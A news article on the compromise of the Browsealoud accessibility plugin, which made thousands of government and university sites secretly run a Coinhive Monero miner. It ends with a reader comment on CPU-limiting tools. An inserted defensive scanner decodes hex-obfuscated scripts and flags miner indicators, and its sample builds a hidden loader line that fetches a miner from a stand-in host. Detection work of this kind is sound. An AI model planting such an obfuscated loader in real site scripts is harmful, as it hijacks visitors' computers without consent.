Cryptojackers Strike Again, Hitting Thousands of Sites Including US and UK Government Pages

Image: Screengrab via Coinhive

Thousands of websites including ones run by the U.S. and U.K. governments secretly hijacked browsers to mine cryptocurrency thanks to a compromised plugin, the Register reported on Sunday.


According to the Register, all of the afflicted websites ran British tech company Texthelp’s Browsealoud plugin, which reads out websites for people with visual impairments like full or partial blindness or conditions like dyslexia. It’s unknown at this time whether someone external to the company was able to compromise the plugin or an insider decided to hijack it for fun and profit, but the list of websites is pretty extensive:

A list of 4,200-plus affected websites can be found here: they include The City University of New York (cuny.edu), Uncle Sam’s court information portal (uscourts.gov), Lund University (lu.se), the UK’s Student Loans Company (slc.co.uk), privacy watchdog The Information Commissioner’s Office (ico.org.uk) and the Financial Ombudsman Service (financial-ombudsman.org.uk), plus a shedload of other .gov.uk and .gov.au sites, UK NHS services, and other organizations across the globe.

Manchester.gov.uk, NHSinform.scot, agriculture.gov.ie, Croydon.gov.uk, ouh.nhs.uk, legislation.qld.gov.au, the list goes on.


The afflicted pages ran a JavaScript-powered Monero miner from Coinhive, the very one which has been implicated in numerous similar incidents. Coinhive, which takes a 30 percent cut of anything mined using unmodified versions of its plugin, officially discourages embedding its miner in websites without informing users up front that it may take a (sometimes significant) slice of their computers’ processing power. But unscrupulous cybercriminals have used it to run Monero-generating botnets that in theory always turn a profit because there’s no real overhead and they’re not paying for the electricity used. Offloading those costs to random web users by injecting miners into other people’s websites, an attack called cryptojacking, has quickly become widespread, and prior attacks are estimated to have generated hundreds of thousands in profits for hackers.

“The injected mining code was obfuscated, but when converted from hexadecimal back to ASCII it spelled out the necessary magic to summon Coinhive’s stealthy JavaScript miner to the page,” the Register reported.
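The decoding step the Register describes, as an added example for site owners auditing third-party scripts (not code from the article, the Register, or Texthelp): it decodes hex escapes in a script's source and reports miner indicators that only appear after decoding. The indicator list, function names, host name and sample plugin text are all constructed for illustration.

```javascript
// Assumption: a minimal indicator list; extend it for your own environment.
const INDICATORS = ["coinhive"];

// Turn \xNN and \uNNNN escapes back into characters so hidden strings become searchable.
function decodeHexEscapes(source) {
  const toChar = (_, hex) => String.fromCharCode(parseInt(hex, 16));
  return source
    .replace(/\\x([0-9a-fA-F]{2})/g, toChar)
    .replace(/\\u([0-9a-fA-F]{4})/g, toChar);
}

// Report each indicator and whether it was visible in plain text or only after decoding.
function scanScript(source) {
  const plain = source.toLowerCase();
  const decoded = decodeHexEscapes(source).toLowerCase();
  const findings = [];
  for (const indicator of INDICATORS) {
    if (plain.includes(indicator)) {
      findings.push({ indicator, obfuscated: false });
    } else if (decoded.includes(indicator)) {
      findings.push({ indicator, obfuscated: true });
    }
  }
  return findings;
}

// Share of the decoded text that was written as \xNN escapes; a sudden jump
// between two versions of a vendor script is worth a manual review.
function escapeDensity(source) {
  const escapes = (source.match(/\\x[0-9a-fA-F]{2}/g) || []).length;
  const decodedLength = decodeHexEscapes(source).length;
  return decodedLength === 0 ? 0 : escapes / decodedLength;
}

// --- Constructed sample input (not the real Browsealoud file or payload) ---
function toHexEscapes(text) {
  return Array.from(text, (c) =>
    "\\x" + c.charCodeAt(0).toString(16).padStart(2, "0")).join("");
}
const cleanPlugin = "function readAloud(el) { speak(el.textContent); }";
const tamperedPlugin = cleanPlugin +
  '\nload("' + toHexEscapes("https://miner.example/coinhive.min.js") + '");';

for (const [name, src] of [["clean", cleanPlugin], ["tampered", tamperedPlugin]]) {
  console.log(name, scanScript(src), escapeDensity(src).toFixed(2));
}
```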

The price of XMR, Monero’s token, peaked at nearly $500 earlier this month but has since fallen back down to around $240, according to sites which track the prices of cryptocurrency.

“Texthelp has in place continuous automated security tests for Browsealoud, and these detected the modified file and as a result the product was taken offline,” Texthelp chief technology officer Martin McKay said in a statement. The company added that “This was a criminal act and a thorough investigation is currently underway” by an independent security company.


[The Register]


DISCUSSION

notspecified
Akinetopsia

With all the new miners popping up, sometimes your ad blocker might miss some, so I suggest using BES (http://mion.faireal.net/BES/).

Using this application you can select a process tree (all running instances of the same executable) and limit the CPU usage for that specific program. By blocking the CPU usage of your browser, you will then starve the miners from what they want. I’ve set it at 15% of my CPU and haven’t seen any issues yet. No website should require more than that.

The added benefit is that you can probably find culprits easily as the browser will probably become unresponsive.